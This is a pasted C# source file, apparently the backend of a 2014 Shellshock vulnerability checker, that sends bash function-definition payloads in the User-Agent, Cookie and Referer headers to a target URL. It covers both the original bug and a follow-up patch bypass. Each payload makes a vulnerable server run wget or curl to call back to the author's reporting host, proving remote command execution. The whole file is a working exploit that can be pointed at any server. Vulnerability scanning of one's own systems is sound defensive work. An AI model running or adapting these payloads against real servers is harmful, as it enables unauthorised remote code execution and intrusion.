
ShellShock.brandonpotter.com

BrandonPotter Sep 25th, 2014 7,935 Never
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Linq;
  4. using System.Net;
  5. using System.Text;
  6. using System.Threading.Tasks;
  7.  
  8. namespace ShellShockExploiter
  9. {
  10.     public class SSExploiter
  11.     {
  12.         public event Action<string> TestExecuted;
  13.  
  14.         public void RunHttpExploitReport(string targetUrl, string testId, string urlNotes)
  15.         {
  16.             string[] headers = new string[] { "User-Agent", "Cookie", "Referer" };
  17.  
  18.             foreach (var header in headers)
  19.             {
  20.                 // original exploit
  21.                 RunSingleTest(targetUrl, "() { :;}; wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-wget", header, urlNotes, "() { :;}; wget");
  22.                 RunSingleTest(targetUrl, "() { :;}; curl http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-curl", header, urlNotes, "() { :;}; curl");
  23.                 RunSingleTest(targetUrl, "() { :;}; /usr/local/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-usr-local-bin-wget", header, urlNotes, "() { :;}; /usr/local/bin/wget");
  24.                 RunSingleTest(targetUrl, "() { :;}; /usr/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-usr-bin-wget", header, urlNotes, "() { :;}; /usr/bin/wget");
  25.  
  26.                 // new exploit for patch
  27.                 // () { (a)=>\' bash -c "echo date"
  28.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c 'wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-wget'", header, urlNotes, "() { (a)=>\' bash -c 'wget");
  29.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c 'curl http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-curl'", header, urlNotes, "() { (a)=>\' bash -c 'curl");
  30.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c '/usr/local/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-usr-local-bin-wget'", header, urlNotes, "() { (a)=>\' bash -c '/usr/local/bin/wget");
  31.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c '/usr/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-usr-bin-wget'", header, urlNotes, "() { (a)=>\' bash -c '/usr/bin/wget");
  32.             }
  33.         }
  34.  
  35.         private void RunSingleTest(string targetUrl, string bashCmd, string header, string urlNotes, string exploitType)
  36.         {            
  37.             ShortWebClient wC = new ShortWebClient();
  38.             string serverResponse = "";
  39.             try
  40.             {
  41.                 wC.Headers.Add(header, bashCmd);
  42.                 wC.DownloadString(targetUrl);
  43.                 serverResponse = "200 OK";
  44.             }
  45.             catch (TimeoutException te)
  46.             {
  47.                 serverResponse = "Timeout";
  48.             }
  49.             catch (WebException e)
  50.             {
  51.                 if (e.Message.Contains("(403) Forbidden"))
  52.                 {
  53.                     serverResponse = "403 Forbidden";
  54.                 }
  55.                 else if (e.Message.Contains("(404) Not Found"))
  56.                 {
  57.                     serverResponse = "404 Not Found";
  58.                 }
  59.                 else
  60.                 {
  61.                     serverResponse = "Error";
  62.                 }
  63.             }
  64.             catch (Exception e) {
  65.                 serverResponse = "No Response or Error";
  66.             }
  67.  
  68.             wC.Dispose();
  69.             wC = null;
  70.  
  71.             try
  72.             {
  73.                 this.TestExecuted("URL " + targetUrl + " (" + urlNotes + ") (Header " + header + " exploit attempted with " + exploitType + ")... " + serverResponse);
  74.             }
  75.             catch { }
  76.         }
  77.     }
  78. }